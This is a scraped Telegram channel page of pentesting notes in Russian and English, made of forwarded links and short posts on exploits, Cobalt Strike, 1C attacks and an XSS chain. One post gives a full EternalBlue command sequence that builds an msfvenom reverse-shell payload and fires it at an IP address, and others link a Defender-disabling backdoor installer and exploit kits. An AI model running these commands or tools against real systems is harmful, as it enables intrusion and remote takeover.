NEW BOT Телеграм, страница

Pentester`s Notes

pentest-book/others/internal-pentest.md at master · six2dez/pentest-book · GitHub
https://github.com/six2dez/pentest-book/blob/master/others/internal-pentest.md

GitHub

pentest-book/others/internal-pentest.md at master · six2dez/pentest-book

Contribute to six2dez/pentest-book development by creating an account on GitHub.

23 viewshidden, 20:25

Pentester`s Notes

Forwarded from Pavel Cherepanov

https://anonymousplanet.org/guide.html

23 viewshidden, 11:11

Pentester`s Notes

Forwarded from Offensive Xwitter

😈 [ ShorSec Cyber Security @ShorSecLtd ]

🔥New Blog Post Alert!
The next chapter in our "The Path to DA" series is now live: "(Relaying) To The Internet And Back".
This entry, by @dec0ne, explores yet another route to DA, focusing on the intricacies of ADIDNS Abuse, LDAP relay, RBCD, and more.

🔗 https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/

🐥 [ tweet ]

23 viewshidden, 11:47

Pentester`s Notes

Forwarded from D3R7K1K

https://github.com/Wh04m1001/CVE-2023-36874 ребят а как из исходников это собрать без sln

GitHub

GitHub - Wh04m1001/CVE-2023-36874

Contribute to Wh04m1001/CVE-2023-36874 development by creating an account on GitHub.

24 viewshidden, 20:23

Pentester`s Notes

Exploit Java Deserialization | Discovering Insecure Deserialization
https://youtube.com/watch?v=lH2VNlf91pY&feature=shared

YouTube

Exploit Java Deserialization | Discovering Insecure Deserialization

Hi... It's been a while. Anyways, here's a new video!

This is the second in a three part series where we dissect Java deserialization vulnerabilities. Building off the last video, we discuss how to identify Java deserialization vulnerabilities from a blackbox…

25 viewshidden, 21:14

Pentester`s Notes

Forwarded from Codeby

SQL-injection, UNION BASED - Быстрые техники

Приветствую тебя читатель! Надеюсь ты уже решил базовые задачки из предыдущей статьи. А сегодня я расскажу о более продвинутых техниках, позволяющих извлекать данные из баз гораздо быстрее. Данный подход называется DIOS (DUMP IN ONE SHOOT

📌 Читать далее

#sql #injection

27 viewshidden, 19:11

Pentester`s Notes

Forwarded from Александр

https://github.com/KraudSecurity/1C-Exploit-Kit

GitHub

GitHub - starev-org/1C-Exploit-Kit: 1C Exploit Kit

1C Exploit Kit. Contribute to starev-org/1C-Exploit-Kit development by creating an account on GitHub.

29 viewshidden, 10:57

Pentester`s Notes

Forwarded from Sergey

PodborParolPol82.epf

173.5 KB

Что именно? Внешняя обработка какая?

29 viewshidden, 11:06

Pentester`s Notes

Forwarded from Aleksey

https://github.com/3ndG4me/AutoBlue-MS17-010

Вот этот более чем рабочий

GitHub

GitHub - 3ndG4me/AutoBlue-MS17-010: This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit…

This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010 - 3ndG4me/AutoBlue-MS17-010

27 viewshidden, 19:48

Pentester`s Notes

Forwarded from Aleksey

nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin

msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=10.14.57.233 LPORT=443 -f raw -o evilReverse.bin

cat evilKernel.bin evilReverse.bin > evilPayload.bin

python3 ../eternalblue_exploit7.py 10.10.118.242 evilPayload.bin 24

Done!

26 viewshidden, 19:49

Pentester`s Notes

Forwarded from Cybred

https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/

Пятничное чтиво про сложные XSS в приватных почтовых сервисах Proton Mail, Skiff и Tutanota.

Описали пока только Proton Mail и цепочка выглядит так:
1. Обман Dom Purify, благодаря неправильному контексту с помощью тега <style> и тем, как он санитизирует его в HTML и SVG, а также последующей обработкой.
2. Побег из Sandbox Iframe из-за атрибута allow-noscripts, который "эксклюзивно" отображался для браузера Safari.
3. Обход CSP с крутой эксфильтрацией через blob и cross-fade() из CSS.

Все это приводит к тому, что, отправив сообщение жертве, атакующий может:
— прочитать ее электронные письма расшифрованном виде
— отправить электронные письма от её имени
— украсть криптографические ключи.

Sonarsource

Code Vulnerabilities Put Proton Mails at Risk

The Sonar Research team discovered critical code vulnerabilities in Proton Mail, Skiff and Tutanota. This post covers the technical details of the XSS vulnerability in Proton Mail.

26 viewshidden, 19:52

Pentester`s Notes

Forwarded from lefury

RTFM - Red Team Field Manual v3.pdf

10.2 MB

30 viewshidden, 08:29

Pentester`s Notes

Forwarded from Deleted Account

https://news.1rj.ru/str/freedomf0x/18341

Freedom F0x

#redteam

27 viewshidden, 08:30

Pentester`s Notes

Forwarded from Offensive Xwitter

😈 [ an0n @an0n_r0 ]

nothing novel, just playing with screenshot capture in PowerShell: get the screenshot to clipboard by sending PrtSc key using PS, send the image in an HTTP POST body, receive it with least effort using a CGI handler ran by Python http[.]server.

🐥 [ tweet ]

30 viewshidden, 12:28

Pentester`s Notes

https://github.com/BRAINIAC22/Disable-Windows-Defender/blob/main/disable-defender/mainFile/winDefender.bat

GitHub

Disable-Windows-Defender/disable-defender/mainFile/winDefender.bat at main · BRAINIAC22/Disable-Windows-Defender

A batch noscript coupled with VBnoscript that first of all disables windows defender and other security threats, and downloads and install payload (malware/backdoor) - BRAINIAC22/Disable-Windows-Defender

29 viewshidden, 06:35

Pentester`s Notes

https://news.1rj.ru/str/c/1562137382?boost

31 viewshidden, 17:57

Pentester`s Notes

Forwarded from Acrono

Cobalt Strike: полезные ссылки

Документация кобы
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm
Cobalt Strike 101
https://www.ired.team/offensive-security/red-team-infrastructure/cobalt-strike-101-installation-and-interesting-commands
Red Team Ops with Cobalt Strike (ОЧЕНЬ рекомендую к просмотру!)
https://www.youtube.com/watch?v=q7VQeK533zI&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no
Cobalt Strike CheatSheet
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md
Примеры использования кобы
https://impacttrial.coresecurity.com/docs/doc/walkthrough/cobaltstrike/cobalt_strike_walkthrough/

#coba #cobaltstrike #guide

www.ired.team

Cobalt Strike 101 | Red Team Notes

27 viewshidden, 07:24

Pentester`s Notes

Forwarded from 1N73LL1G3NC3

0:26

This media is not supported in your browser

VIEW IN TELEGRAM

ZipLink - Combine Zips and Lnk for fun and profit

Lnk files are still widely used for initial access.
However modern browsers change the file ending during download, so other ways of distribusion are needed.
For example an hta - lnk polyglot, zipped.

30 viewshidden, 20:22

Pentester`s Notes

Forwarded from Offensive Xwitter

😈 [ eversinc33 @eversinc33 ]

Nice tool:) Reminded me of a noscript I wrote a while ago, which is for those environments where users have to change their pws every X months, resulting in passwords like January2022. The noscript simply uses the LDAP pwdLastSet attr to generate a wordlist.

🔗 https://github.com/eversinc33/CredGuess

🐥 [ tweet ][ quote ]

28 viewshidden, 18:24

Pentester`s Notes

Forwarded from sdnv's funk-hole

Пентестеры в СНГ часто сталкиваются с 1С-серверами внутри инфраструктур, один из векторов атак - Консоль Администрирования Кластеров 1С (RAS).
Чтобы попытаться подключиться к нему - подбирают версию клиента коноли аналогичную серверу, скачивают нужный серверный дистрибутив под винду и только тогда смогут зайти под имеющимися/пустыми кредами получая кучу полезной информации.

Я автоматизировал этот процесс благодаря консольной утилите rac от 1С для Linux. Более того, больше не нужно подбирать версию клиента и сервера - утилита rac работает с разными версиями серверов.

Этапы: Скан nmap с поиском открытых портов RAS, Сбор информации при успешном подключении к серверу, Выгрузка полученной информации в .csv под каждый сервер. Более подробно в README

https://github.com/sdnv0x4d/rasoff

GitHub

GitHub - sdnv0x4d/rasoff: 1C RAS Offensive Security Tool

1C RAS Offensive Security Tool. Contribute to sdnv0x4d/rasoff development by creating an account on GitHub.

33 viewshidden, 12:03

Pentester`s Notes

Forwarded from Кавычка (Bo0oM)

Снова про #1С

Как пишут в документации: "Внешние обработки представляют собой обработки, которые не входят в состав прикладного решения и хранятся в отдельных файлах с расширением *. epf.".
Так же пишут: "В режиме 1С:Предприятие внешнюю обработку можно запустить на выполнение, открыв ее как любой другой файл, хранящийся на диске."

В правом верхнем углу нажимаем на "бутерброд" -> Файл -> Открыть.

Выбираем наш epf и жмём "ок".
Но только 1С может быть не только под Windows, но и под Linux. Поэтому в коллекцию еще один шелл, который универсальный и под любую операционную систему.

>

34 viewshidden, 10:39

About

Blog

Apps

Platform